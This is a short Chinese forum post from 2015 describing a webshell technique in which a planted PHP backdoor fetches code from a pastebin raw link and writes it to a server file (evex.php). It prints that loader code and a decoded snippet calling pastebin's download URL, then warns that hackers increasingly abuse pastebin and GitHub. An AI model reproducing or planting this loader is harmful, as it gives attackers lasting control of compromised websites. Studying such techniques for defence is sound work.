关于webshell的思路 － pastebin

踩(1)

顶(13)

杀戮 (有事请 at 大号园长) | 2015-01-07 17:40

这两天某国外黑客写了一篇文章关于他发现的一种webshell中使用的手法，大体说说思路，原文就不翻译了，我懒。

简单来说就是通过一个很简单的代码远程通过pastebin下载代码并且执行。

code:
if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin . com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php", 'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}

pastebin是一个国外黑客，程序员经常分享资源，种子，代码的地方。经常从国外获取资源的同学应该会知道经常有黑客把自己黑来的数据库直接放上面进行共享。pastebin允许用户下载原始格式的代码文件，就是说黑客可以使用后门直接下载其他黑客共享的后门，或者给网站植入存在漏洞的网页。

这是其中一个例子，代码已经经过解码。



还有一件事就是印度尼西亚某sb特地制作了pastebin编码器



上面的代码解码后的结果。

function FathurFreakz($ct3){
xcurl('http://pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);

总之要给出一个结论就是，像github pastebin这种充斥着数据和方便的功能的网站正在越来越多的被黑客利用。